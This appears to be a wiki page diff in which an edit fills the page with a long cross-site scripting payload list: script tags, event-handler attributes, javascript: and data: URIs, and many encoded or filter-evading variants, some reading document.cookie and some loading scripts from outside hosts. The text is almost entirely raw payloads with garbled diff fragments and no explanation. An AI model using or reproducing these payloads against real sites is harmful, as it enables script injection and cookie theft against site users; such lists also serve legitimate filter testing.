k (→What is it[edit | edit source]:
<script>alert(1)</script>) |
(%253Cscript%253Ealert('XSS')%253C%252Fscript%253E <IMG SRC=x onload="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onafterprint="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onbeforeprint="alert(String.fromCharCode(88,83,83))"> <IMG SRC=x onbefor) |
||
Regel 1: | Regel 1: | ||
javascript:alert(1)< | %253Cscript%253Ealert('XSS')%253C%252Fscript%253E | ||
== | <IMG SRC=x onload="alert(String.fromCharCode(88,83,83))"> | ||
[[ | <IMG SRC=x onafterprint="alert(String.fromCharCode(88,83,83))"> | ||
<IMG SRC=x onbeforeprint="alert(String.fromCharCode(88,83,83))"> | |||
<br /> | <IMG SRC=x onbeforeunload="alert(String.fromCharCode(88,83,83))"> | ||
<IMG SRC=x onerror="alert(String.fromCharCode(88,83,83))"> | |||
<IMG SRC=x onhashchange="alert(String.fromCharCode(88,83,83))"> | |||
<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))"> | |||
< | <IMG SRC=x onmessage="alert(String.fromCharCode(88,83,83))"> | ||
<IMG SRC=x ononline="alert(String.fromCharCode(88,83,83))"> | |||
<IMG SRC=x onoffline="alert(String.fromCharCode(88,83,83))"> | |||
<IMG SRC=x onpagehide="alert(String.fromCharCode(88,83,83))"> | |||
<IMG SRC=x onpageshow="alert(String.fromCharCode(88,83,83))"> | |||
<IMG SRC=x onpopstate="alert(String.fromCharCode(88,83,83))"> | |||
<IMG SRC=x onresize="alert(String.fromCharCode(88,83,83))"> | |||
<IMG SRC=x onstorage="alert(String.fromCharCode(88,83,83))"> | |||
<IMG SRC=x onunload="alert(String.fromCharCode(88,83,83))"> | |||
<IMG SRC=x onblur="alert(String.fromCharCode(88,83,83))"> | |||
<IMG SRC=x onchange="alert(String.fromCharCode(88,83,83))"> | |||
<IMG SRC=x oncontextmenu="alert(String.fromCharCode(88,83,83))"> | |||
<IMG SRC=x oninput="alert(String.fromCharCode(88,83,83))"> | |||
<IMG SRC=x oninvalid="alert(String.fromCharCode(88,83,83))"> | |||
<IMG SRC=x onreset="alert(String.fromCharCode(88,83,83))"> | |||
<IMG SRC=x onsearch="alert(String.fromCharCode(88,83,83))"> | |||
<IMG SRC=x onselect="alert(String.fromCharCode(88,83,83))"> | |||
<IMG SRC=x onsubmit="alert(String.fromCharCode(88,83,83))"> | |||
<IMG SRC=x onkeydown="alert(String.fromCharCode(88,83,83))"> | |||
<IMG SRC=x onkeypress="alert(String.fromCharCode(88,83,83))"> | |||
<IMG SRC=x onkeyup="alert(String.fromCharCode(88,83,83))"> | |||
<IMG SRC=x onclick="alert(String.fromCharCode(88,83,83))"> | |||
<IMG SRC=x ondblclick="alert(String.fromCharCode(88,83,83))"> | |||
<IMG SRC=x onmousedown="alert(String.fromCharCode(88,83,83))"> | |||
<IMG SRC=x onmousemove="alert(String.fromCharCode(88,83,83))"> | |||
<IMG SRC=x onmouseout="alert(String.fromCharCode(88,83,83))"> | |||
<IMG SRC=x onmouseover="alert(String.fromCharCode(88,83,83))"> | |||
<IMG SRC=x onmouseup="alert(String.fromCharCode(88,83,83))"> | |||
<IMG SRC=x onmousewheel="alert(String.fromCharCode(88,83,83))"> | |||
<IMG SRC=x onwheel="alert(String.fromCharCode(88,83,83))"> | |||
<IMG SRC=x ondrag="alert(String.fromCharCode(88,83,83))"> | |||
<IMG SRC=x ondragend="alert(String.fromCharCode(88,83,83))"> | |||
<IMG SRC=x ondragenter="alert(String.fromCharCode(88,83,83))"> | |||
<IMG SRC=x ondragleave="alert(String.fromCharCode(88,83,83))"> | |||
<IMG SRC=x ondragover="alert(String.fromCharCode(88,83,83))"> | |||
<IMG SRC=x ondragstart="alert(String.fromCharCode(88,83,83))"> | |||
<IMG SRC=x ondrop="alert(String.fromCharCode(88,83,83))"> | |||
<IMG SRC=x onscroll="alert(String.fromCharCode(88,83,83))"> | |||
<IMG SRC=x oncopy="alert(String.fromCharCode(88,83,83))"> | |||
<IMG SRC=x oncut="alert(String.fromCharCode(88,83,83))"> | |||
<IMG SRC=x onpaste="alert(String.fromCharCode(88,83,83))"> | |||
<IMG SRC=x onabort="alert(String.fromCharCode(88,83,83))"> | |||
<IMG SRC=x oncanplay="alert(String.fromCharCode(88,83,83))"> | |||
<IMG SRC=x oncanplaythrough="alert(String.fromCharCode(88,83,83))"> | |||
<IMG SRC=x oncuechange="alert(String.fromCharCode(88,83,83))"> | |||
<IMG SRC=x ondurationchange="alert(String.fromCharCode(88,83,83))"> | |||
<IMG SRC=x onemptied="alert(String.fromCharCode(88,83,83))"> | |||
<IMG SRC=x onended="alert(String.fromCharCode(88,83,83))"> | |||
<IMG SRC=x onerror="alert(String.fromCharCode(88,83,83))"> | |||
<IMG SRC=x onloadeddata="alert(String.fromCharCode(88,83,83))"> | |||
<IMG SRC=x onloadedmetadata="alert(String.fromCharCode(88,83,83))"> | |||
<IMG SRC=x onloadstart="alert(String.fromCharCode(88,83,83))"> | |||
<IMG SRC=x onpause="alert(String.fromCharCode(88,83,83))"> | |||
<IMG SRC=x onplay="alert(String.fromCharCode(88,83,83))"> | |||
<IMG SRC=x onplaying="alert(String.fromCharCode(88,83,83))"> | |||
<IMG SRC=x onprogress="alert(String.fromCharCode(88,83,83))"> | |||
<IMG SRC=x onratechange="alert(String.fromCharCode(88,83,83))"> | |||
<IMG SRC=x onseeked="alert(String.fromCharCode(88,83,83))"> | |||
<IMG SRC=x onseeking="alert(String.fromCharCode(88,83,83))"> | |||
<IMG SRC=x onstalled="alert(String.fromCharCode(88,83,83))"> | |||
<IMG SRC=x onsuspend="alert(String.fromCharCode(88,83,83))"> | |||
<IMG SRC=x ontimeupdate="alert(String.fromCharCode(88,83,83))"> | |||
<IMG SRC=x onvolumechange="alert(String.fromCharCode(88,83,83))"> | |||
<IMG SRC=x onwaiting="alert(String.fromCharCode(88,83,83))"> | |||
<IMG SRC=x onshow="alert(String.fromCharCode(88,83,83))"> | |||
<IMG SRC=x ontoggle="alert(String.fromCharCode(88,83,83))"> | |||
<META onpaonpageonpagonpageonpageshowshoweshowshowgeshow="alert(1)"; | |||
<IMG SRC=x onload="alert(String.fromCharCode(88,83,83))"> | |||
<INPUT TYPE="BUTTON" action="alert('XSS')"/> | |||
"><h1><IFRAME SRC="javascript:alert('XSS');"></IFRAME>">123</h1> | |||
"><h1><IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>123</h1> | |||
<IFRAME SRC="javascript:alert('XSS');"></IFRAME> | |||
<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME> | |||
"><h1><IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>123</h1> | |||
"></iframe><script>alert(`TEXT YOU WANT TO BE DISPLAYED`);</script><iframe frameborder="0%EF%BB%BF | |||
"><h1><IFRAME width="420" height="315" SRC="http://www.youtube.com/embed/sxvccpasgTE" frameborder="0" onmouseover="alert(document.cookie)"></IFRAME>123</h1> | |||
"><h1><iframe width="420" height="315" src="http://www.youtube.com/embed/sxvccpasgTE" frameborder="0" allowfullscreen></iframe>123</h1> | |||
><h1><IFRAME width="420" height="315" frameborder="0" onmouseover="document.location.href='https://www.youtube.com/channel/UC9Qa_gXarSmObPX3ooIQZr | |||
g'"></IFRAME>Hover the cursor to the LEFT of this Message</h1>&ParamHeight=250 | |||
<IFRAME width="420" height="315" frameborder="0" onload="alert(document.cookie)"></IFRAME> | |||
"><h1><IFRAME SRC="javascript:alert('XSS');"></IFRAME>">123</h1> | |||
"><h1><IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>123</h1> | |||
<iframe src=http://xss.rocks/scriptlet.html < | |||
<IFRAME SRC="javascript:alert('XSS');"></IFRAME> | |||
<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME> | |||
<iframe src="	javascript:prompt(1)	"> | |||
<svg><style>{font-family:'<iframe/onload=confirm(1)>' | |||
<input/onmouseover="javaSCRIPT:confirm(1)" | |||
<sVg><scRipt >alert(1) {Opera} | |||
<img/src=`` onerror=this.onerror=confirm(1) | |||
<form><isindex formaction="javascript:confirm(1)" | |||
<img src=``
 onerror=alert(1)
 | |||
<script/	 src='https://dl.dropbox.com/u/13018058/js.js' /	></script> | |||
<ScRipT 5-0*3+9/3=>prompt(1)</ScRipT giveanswerhere=? | |||
<iframe/src="data:text/html;	base64	,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg=="> | |||
<script /**/>/**/alert(1)/**/</script /**/ | |||
"><h1/onmouseover='\u0061lert(1)'> | |||
<iframe/src="data:text/html,<svg onload=alert(1)>"> | |||
<meta content="
 1 
; JAVASCRIPT: alert(1)" http-equiv="refresh"/> | |||
<svg><script xlink:href=data:,window.open('https://www.google.com/') </script | |||
<svg><script x:href='https://dl.dropbox.com/u/13018058/js.js' {Opera} | |||
<meta http-equiv="refresh" content="0;url=javascript:confirm(1)"> | |||
<iframe src=javascript:alert(document.location)> | |||
<form><a href="javascript:\u0061lert(1)">X</script><img/*/src="worksinchrome:prompt(1)"/*/onerror='eval(src)'> | |||
<img/	  src=`~` onerror=prompt(1)> | |||
<form><iframe 	  src="javascript:alert(1)" 	;> | |||
<a href="data:application/x-x509-user-cert;
base64
,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="	 >X</a | |||
http://www.google<script .com>alert(document.location)</script | |||
<a href=[�]"� onmouseover=prompt(1)//">XYZ</a | |||
<img/src=@  onerror = prompt('1') | |||
<style/onload=prompt('XSS') | |||
<script ^__^>alert(String.fromCharCode(49))</script ^__^ | |||
</style  ><script   :-(>/**/alert(document.location)/**/</script   :-( | |||
�</form><input type="date" onfocus="alert(1)"> | |||
<form><textarea onkeyup='\u0061\u006C\u0065\u0072\u0074(1)'> | |||
<script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/ | |||
<iframe srcdoc='<body onload=prompt(1)>'> | |||
<a href="javascript:void(0)" onmouseover=
javascript:alert(1)
>X</a> | |||
<script [[User:Loveme5454|Loveme5454]] ([[User talk:Loveme5454|talk]])>alert(0%0)</script [[User:Loveme5454|Loveme5454]] ([[User talk:Loveme5454|talk]])> | |||
<style/onload=<!--	> alert (1)> | |||
<///style///><span %2F onmousemove='alert(1)'>SPAN | |||
<img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=	prompt(1) | |||
"><svg><style>{-o-link-source:'<body/onload=confirm(1)>' | |||
<blink/ onmouseover=prompt(1)>OnMouseOver {Firefox & Opera} | |||
<marquee onstart='javascript:alert(1)'>^__^ | |||
<div/style="width:expression(confirm(1))">X</div> {IE7} | |||
<iframe// src=javaSCRIPT:alert(1) | |||
//<form/action=javascript:alert(document.cookie)><input/type='submit'>// | |||
/*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/> | |||
//|\\ <script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\ </script //|\\ | |||
</font>/<svg><style>{src:'<style/onload=this.onload=confirm(1)>'</font>/</style> | |||
<a/href="javascript: javascript:prompt(1)"><input type="X"> | |||
</plaintext\></|\><plaintext/onmouseover=prompt(1) | |||
</svg>''<svg><script 'AQuickBrownFoxJumpsOverTheLazyDog'>alert(1) {Opera} | |||
<a href="javascript:\u0061le%72t(1)"><button> | |||
<div onmouseover='alert(1)'>DIV</div> | |||
<iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)"> | |||
<a href="jAvAsCrIpT:alert(1)">X</a> | |||
<embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> | |||
<object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> | |||
<var onmouseover="prompt(1)">On Mouse Over</var> | |||
<a href=javascript:alert(document.cookie)>Click Here</a> | |||
<img src="/" =_=" title="onerror='prompt(1)'"> | |||
<%<!--'%><script>alert(1);</script --> | |||
<script src="data:text/javascript,alert(1)"></script> | |||
<iframe/src \/\/onload = prompt(1) | |||
<iframe/onreadystatechange=alert(1) | |||
<svg/onload=alert(1) | |||
<input value=<><iframe/src=javascript:confirm(1) | |||
<input type="text" value=`` <div/onmouseover='alert(1)'>X</div> | |||
http://www.<script>alert(1)</script .com | |||
<iframe src=j
	a
		v
			a
				s
					c
						r
							i
								p
									t
										:a
											l
												e
													r
														t
															28
																1
																	%29></iframe> | |||
<svg><script ?>alert(1) | |||
<iframe src=j	a	v	a	s	c	r	i	p	t	:a	l	e	r	t	%28	1	%29></iframe> | |||
<img src=`xx:xx`onerror=alert(1)> | |||
<object type="text/x-scriptlet" data="http://jsfiddle.net/XLE63/ "></object> | |||
<meta http-equiv="refresh" content="0;javascript:alert(1)"/> | |||
<math><a xlink:href="//jsfiddle.net/t846h/">click | |||
<embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always> | |||
<svg contentScriptType=text/vbs><script>MsgBox+1 | |||
<a href="data:text/html;base64_,<svg/onload=\u0061le%72t(1)>">X</a | |||
<iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('\u0061') worksinIE> | |||
<script>~'\u0061' ; \u0074\u0068\u0072\u006F\u0077 ~ \u0074\u0068\u0069\u0073. \u0061\u006C\u0065\u0072\u0074(~'\u0061')</script U+ | |||
<script/src="data:text%2Fj\u0061v\u0061script,\u0061lert('\u0061')"></script a=\u0061 & /=%2F | |||
<script/src=data:text/j\u0061v\u0061script,\u0061%6C%65%72%74(/XSS/)></script | |||
<object data=javascript:\u0061le%72t(1)> | |||
<script>+-+-1-+-+alert(1)</script> | |||
<body/onload=<!-->
alert(1)> | |||
<script itworksinallbrowsers>/*<script* */alert(1)</script | |||
<img src ?itworksonchrome?\/onerror = alert(1) | |||
<svg><script>//
confirm(1);</script </svg> | |||
<svg><script onlypossibleinopera:-)> alert(1) | |||
<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=javascript:alert(1)>ClickMe | |||
<script x> alert(1) </script 1=2 | |||
<div/onmouseover='alert(1)'> style="x:"> | |||
<--`<img/src=` onerror=alert(1)> --!> | |||
<script/src=data:text/javascript,alert(1)></script> | |||
<div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)" onclick="alert(1)">x</button> | |||
"><img src=x onerror=window.open('https://www.google.com/');> | |||
<form><button formaction=javascript:alert(1)>CLICKME | |||
<math><a xlink:href="//jsfiddle.net/t846h/">click | |||
<object data=data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+></object> | |||
<iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe> | |||
<a href="data:text/html;blabla,<script src="http://sternefamily.net/foo.js"></script>​">Click Me</a> | |||
<script\x20type="text/javascript">javascript:alert(1);</script> | |||
<script\x3Etype="text/javascript">javascript:alert(1);</script> | |||
<script\x0Dtype="text/javascript">javascript:alert(1);</script> | |||
<script\x09type="text/javascript">javascript:alert(1);</script> | |||
<script\x0Ctype="text/javascript">javascript:alert(1);</script> | |||
<script\x2Ftype="text/javascript">javascript:alert(1);</script> | |||
<script\x0Atype="text/javascript">javascript:alert(1);</script> | |||
'`"><\x3Cscript>javascript:alert(1)</script> | |||
'`"><\x00script>javascript:alert(1)</script> | |||
<img src=1 href=1 onerror="javascript:alert(1)"></img> | |||
<audio src=1 href=1 onerror="javascript:alert(1)"></audio> | |||
<video src=1 href=1 onerror="javascript:alert(1)"></video> | |||
<body src=1 href=1 onerror="javascript:alert(1)"></body> | |||
<image src=1 href=1 onerror="javascript:alert(1)"></image> | |||
<object src=1 href=1 onerror="javascript:alert(1)"></object> | |||
<script src=1 href=1 onerror="javascript:alert(1)"></script> | |||
<svg onResize svg onResize="javascript:javascript:alert(1)"></svg onResize> | |||
<title onPropertyChange title onPropertyChange="javascript:javascript:alert(1)"></title onPropertyChange> | |||
<iframe onLoad iframe onLoad="javascript:javascript:alert(1)"></iframe onLoad> | |||
<body onMouseEnter body onMouseEnter="javascript:javascript:alert(1)"></body onMouseEnter> | |||
<body onFocus body onFocus="javascript:javascript:alert(1)"></body onFocus> | |||
<frameset onScroll frameset onScroll="javascript:javascript:alert(1)"></frameset onScroll> | |||
<script onReadyStateChange script onReadyStateChange="javascript:javascript:alert(1)"></script onReadyStateChange> | |||
<html onMouseUp html onMouseUp="javascript:javascript:alert(1)"></html onMouseUp> | |||
<body onPropertyChange body onPropertyChange="javascript:javascript:alert(1)"></body onPropertyChange> | |||
<svg onLoad svg onLoad="javascript:javascript:alert(1)"></svg onLoad> | |||
<body onPageHide body onPageHide="javascript:javascript:alert(1)"></body onPageHide> | |||
<body onMouseOver body onMouseOver="javascript:javascript:alert(1)"></body onMouseOver> | |||
<body onUnload body onUnload="javascript:javascript:alert(1)"></body onUnload> | |||
<body onLoad body onLoad="javascript:javascript:alert(1)"></body onLoad> | |||
<bgsound onPropertyChange bgsound onPropertyChange="javascript:javascript:alert(1)"></bgsound onPropertyChange> | |||
<html onMouseLeave html onMouseLeave="javascript:javascript:alert(1)"></html onMouseLeave> | |||
<html onMouseWheel html onMouseWheel="javascript:javascript:alert(1)"></html onMouseWheel> | |||
<style onLoad style onLoad="javascript:javascript:alert(1)"></style onLoad> | |||
<iframe onReadyStateChange iframe onReadyStateChange="javascript:javascript:alert(1)"></iframe onReadyStateChange> | |||
<body onPageShow body onPageShow="javascript:javascript:alert(1)"></body onPageShow> | |||
<style onReadyStateChange style onReadyStateChange="javascript:javascript:alert(1)"></style onReadyStateChange> | |||
<frameset onFocus frameset onFocus="javascript:javascript:alert(1)"></frameset onFocus> | |||
<applet onError applet onError="javascript:javascript:alert(1)"></applet onError> | |||
<marquee onStart marquee onStart="javascript:javascript:alert(1)"></marquee onStart> | |||
<script onLoad script onLoad="javascript:javascript:alert(1)"></script onLoad> | |||
<html onMouseOver html onMouseOver="javascript:javascript:alert(1)"></html onMouseOver> | |||
<html onMouseEnter html onMouseEnter="javascript:parent.javascript:alert(1)"></html onMouseEnter> | |||
<body onBeforeUnload body onBeforeUnload="javascript:javascript:alert(1)"></body onBeforeUnload> | |||
<html onMouseDown html onMouseDown="javascript:javascript:alert(1)"></html onMouseDown> | |||
<marquee onScroll marquee onScroll="javascript:javascript:alert(1)"></marquee onScroll> | |||
<xml onPropertyChange xml onPropertyChange="javascript:javascript:alert(1)"></xml onPropertyChange> | |||
<frameset onBlur frameset onBlur="javascript:javascript:alert(1)"></frameset onBlur> | |||
<applet onReadyStateChange applet onReadyStateChange="javascript:javascript:alert(1)"></applet onReadyStateChange> | |||
<svg onUnload svg onUnload="javascript:javascript:alert(1)"></svg onUnload> | |||
<html onMouseOut html onMouseOut="javascript:javascript:alert(1)"></html onMouseOut> | |||
<body onMouseMove body onMouseMove="javascript:javascript:alert(1)"></body onMouseMove> | |||
<body onResize body onResize="javascript:javascript:alert(1)"></body onResize> | |||
<object onError object onError="javascript:javascript:alert(1)"></object onError> | |||
<body onPopState body onPopState="javascript:javascript:alert(1)"></body onPopState> | |||
<html onMouseMove html onMouseMove="javascript:javascript:alert(1)"></html onMouseMove> | |||
<applet onreadystatechange applet onreadystatechange="javascript:javascript:alert(1)"></applet onreadystatechange> | |||
<body onpagehide body onpagehide="javascript:javascript:alert(1)"></body onpagehide> | |||
<svg onunload svg onunload="javascript:javascript:alert(1)"></svg onunload> | |||
<applet onerror applet onerror="javascript:javascript:alert(1)"></applet onerror> | |||
<body onkeyup body onkeyup="javascript:javascript:alert(1)"></body onkeyup> | |||
<body onunload body onunload="javascript:javascript:alert(1)"></body onunload> | |||
<iframe onload iframe onload="javascript:javascript:alert(1)"></iframe onload> | |||
<body onload body onload="javascript:javascript:alert(1)"></body onload> | |||
<html onmouseover html onmouseover="javascript:javascript:alert(1)"></html onmouseover> | |||
<object onbeforeload object onbeforeload="javascript:javascript:alert(1)"></object onbeforeload> | |||
<body onbeforeunload body onbeforeunload="javascript:javascript:alert(1)"></body onbeforeunload> | |||
<body onfocus body onfocus="javascript:javascript:alert(1)"></body onfocus> | |||
<body onkeydown body onkeydown="javascript:javascript:alert(1)"></body onkeydown> | |||
<iframe onbeforeload iframe onbeforeload="javascript:javascript:alert(1)"></iframe onbeforeload> | |||
<iframe src iframe src="javascript:javascript:alert(1)"></iframe src> | |||
<svg onload svg onload="javascript:javascript:alert(1)"></svg onload> | |||
<html onmousemove html onmousemove="javascript:javascript:alert(1)"></html onmousemove> | |||
<body onblur body onblur="javascript:javascript:alert(1)"></body onblur> | |||
\x3Cscript>javascript:alert(1)</script> | |||
'"`><script>/* *\x2Fjavascript:alert(1)// */</script> | |||
<script>javascript:alert(1)</script\x0D | |||
<script>javascript:alert(1)</script\x0A | |||
<script>javascript:alert(1)</script\x0B | |||
<script charset="\x22>javascript:alert(1)</script> | |||
<!--\x3E<img src=xxx:x onerror=javascript:alert(1)> --> | |||
--><!-- ---> <img src=xxx:x onerror=javascript:alert(1)> --> | |||
--><!-- --\x00> <img src=xxx:x onerror=javascript:alert(1)> --> | |||
--><!-- --\x21> <img src=xxx:x onerror=javascript:alert(1)> --> | |||
--><!-- --\x3E> <img src=xxx:x onerror=javascript:alert(1)> --> | |||
`"'><img src='#\x27 onerror=javascript:alert(1)> | |||
<a href="javascript\x3Ajavascript:alert(1)" id="fuzzelement1">test</a> | |||
"'`><p><svg><script>a='hello\x27;javascript:alert(1)//';</script></p> | |||
<a href="javas\x00cript:javascript:alert(1)" id="fuzzelement1">test</a> | |||
<a href="javas\x07cript:javascript:alert(1)" id="fuzzelement1">test</a> | |||
<a href="javas\x0Dcript:javascript:alert(1)" id="fuzzelement1">test</a> | |||
<a href="javas\x0Acript:javascript:alert(1)" id="fuzzelement1">test</a> | |||
<a href="javas\x08cript:javascript:alert(1)" id="fuzzelement1">test</a> | |||
<a href="javas\x02cript:javascript:alert(1)" id="fuzzelement1">test</a> | |||
<a href="javas\x03cript:javascript:alert(1)" id="fuzzelement1">test</a> | |||
<a href="javas\x04cript:javascript:alert(1)" id="fuzzelement1">test</a> | |||
<a href="javas\x01cript:javascript:alert(1)" id="fuzzelement1">test</a> | |||
<a href="javas\x05cript:javascript:alert(1)" id="fuzzelement1">test</a> | |||
<a href="javas\x0Bcript:javascript:alert(1)" id="fuzzelement1">test</a> | |||
<a href="javas\x09cript:javascript:alert(1)" id="fuzzelement1">test</a> | |||
<a href="javas\x06cript:javascript:alert(1)" id="fuzzelement1">test</a> | |||
<a href="javas\x0Ccript:javascript:alert(1)" id="fuzzelement1">test</a> | |||
<script>/* *\x2A/javascript:alert(1)// */</script> | |||
<script>/* *\x00/javascript:alert(1)// */</script> | |||
<style></style\x3E<img src="about:blank" onerror=javascript:alert(1)//></style> | |||
<style></style\x0D<img src="about:blank" onerror=javascript:alert(1)//></style> | |||
<style></style\x09<img src="about:blank" onerror=javascript:alert(1)//></style> | |||
<style></style\x20<img src="about:blank" onerror=javascript:alert(1)//></style> | |||
<style></style\x0A<img src="about:blank" onerror=javascript:alert(1)//></style> | |||
"'`>ABC<div style="font-family:'foo'\x7Dx:expression(javascript:alert(1);/*';">DEF | |||
"'`>ABC<div style="font-family:'foo'\x3Bx:expression(javascript:alert(1);/*';">DEF | |||
<script>if("x\\xE1\x96\x89".length==2) { javascript:alert(1);}</script> | |||
<script>if("x\\xE0\xB9\x92".length==2) { javascript:alert(1);}</script> | |||
<script>if("x\\xEE\xA9\x93".length==2) { javascript:alert(1);}</script> | |||
'`"><\x3Cscript>javascript:alert(1)</script> | |||
'`"><\x00script>javascript:alert(1)</script> | |||
"'`><\x3Cimg src=xxx:x onerror=javascript:alert(1)> | |||
"'`><\x00img src=xxx:x onerror=javascript:alert(1)> | |||
<script src="data:text/plain\x2Cjavascript:alert(1)"></script> | |||
<script src="data:\xD4\x8F,javascript:alert(1)"></script> | |||
<script src="data:\xE0\xA4\x98,javascript:alert(1)"></script> | |||
<script src="data:\xCB\x8F,javascript:alert(1)"></script> | |||
<script\x20type="text/javascript">javascript:alert(1);</script> | |||
<script\x3Etype="text/javascript">javascript:alert(1);</script> | |||
<script\x0Dtype="text/javascript">javascript:alert(1);</script> | |||
<script\x09type="text/javascript">javascript:alert(1);</script> | |||
<script\x0Ctype="text/javascript">javascript:alert(1);</script> | |||
<script\x2Ftype="text/javascript">javascript:alert(1);</script> | |||
<script\x0Atype="text/javascript">javascript:alert(1);</script> | |||
ABC<div style="x\x3Aexpression(javascript:alert(1)">DEF | |||
ABC<div style="x:expression\x5C(javascript:alert(1)">DEF | |||
ABC<div style="x:expression\x00(javascript:alert(1)">DEF | |||
ABC<div style="x:exp\x00ression(javascript:alert(1)">DEF | |||
ABC<div style="x:exp\x5Cression(javascript:alert(1)">DEF | |||
ABC<div style="x:\x0Aexpression(javascript:alert(1)">DEF | |||
ABC<div style="x:\x09expression(javascript:alert(1)">DEF | |||
ABC<div style="x:\xE3\x80\x80expression(javascript:alert(1)">DEF | |||
ABC<div style="x:\xE2\x80\x84expression(javascript:alert(1)">DEF | |||
ABC<div style="x:\xC2\xA0expression(javascript:alert(1)">DEF | |||
ABC<div style="x:\xE2\x80\x80expression(javascript:alert(1)">DEF | |||
ABC<div style="x:\xE2\x80\x8Aexpression(javascript:alert(1)">DEF | |||
ABC<div style="x:\x0Dexpression(javascript:alert(1)">DEF | |||
ABC<div style="x:\x0Cexpression(javascript:alert(1)">DEF | |||
ABC<div style="x:\xE2\x80\x87expression(javascript:alert(1)">DEF | |||
ABC<div style="x:\xEF\xBB\xBFexpression(javascript:alert(1)">DEF | |||
ABC<div style="x:\x20expression(javascript:alert(1)">DEF | |||
ABC<div style="x:\xE2\x80\x88expression(javascript:alert(1)">DEF | |||
ABC<div style="x:\x00expression(javascript:alert(1)">DEF | |||
ABC<div style="x:\xE2\x80\x8Bexpression(javascript:alert(1)">DEF | |||
ABC<div style="x:\xE2\x80\x86expression(javascript:alert(1)">DEF | |||
ABC<div style="x:\xE2\x80\x85expression(javascript:alert(1)">DEF | |||
ABC<div style="x:\xE2\x80\x82expression(javascript:alert(1)">DEF | |||
ABC<div style="x:\x0Bexpression(javascript:alert(1)">DEF | |||
ABC<div style="x:\xE2\x80\x81expression(javascript:alert(1)">DEF | |||
ABC<div style="x:\xE2\x80\x83expression(javascript:alert(1)">DEF | |||
ABC<div style="x:\xE2\x80\x89expression(javascript:alert(1)">DEF | |||
<a href="\x0Bjavascript:javascript:alert(1)" id="fuzzelement1">test</a> | |||
<a href="\x0Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a> | |||
<a href="\xC2\xA0javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |||
<a href="\x05javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |||
<a href="\xE1\xA0\x8Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a> | |||
<a href="\x18javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |||
<a href="\x11javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |||
<a href="\xE2\x80\x88javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |||
<a href="\xE2\x80\x89javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |||
<a href="\xE2\x80\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |||
<a href="\x17javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |||
<a href="\x03javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |||
<a href="\x0Ejavascript:javascript:alert(1)" id="fuzzelement1">test</a> | |||
<a href="\x1Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a> | |||
<a href="\x00javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |||
<a href="\x10javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |||
<a href="\xE2\x80\x82javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |||
<a href="\x20javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |||
<a href="\x13javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |||
<a href="\x09javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |||
<a href="\xE2\x80\x8Ajavascript:javascript:alert(1)" id="fuzzelement1">test</a> | |||
<a href="\x14javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |||
<a href="\x19javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |||
<a href="\xE2\x80\xAFjavascript:javascript:alert(1)" id="fuzzelement1">test</a> | |||
<a href="\x1Fjavascript:javascript:alert(1)" id="fuzzelement1">test</a> | |||
<a href="\xE2\x80\x81javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |||
<a href="\x1Djavascript:javascript:alert(1)" id="fuzzelement1">test</a> | |||
<a href="\xE2\x80\x87javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |||
<a href="\x07javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |||
<a href="\xE1\x9A\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |||
<a href="\xE2\x80\x83javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |||
<a href="\x04javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |||
<a href="\x01javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |||
<a href="\x08javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |||
<a href="\xE2\x80\x84javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |||
<a href="\xE2\x80\x86javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |||
<a href="\xE3\x80\x80javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |||
<a href="\x12javascript:javascript:alert(1)" id="fuzzelement1">test</a> | |||
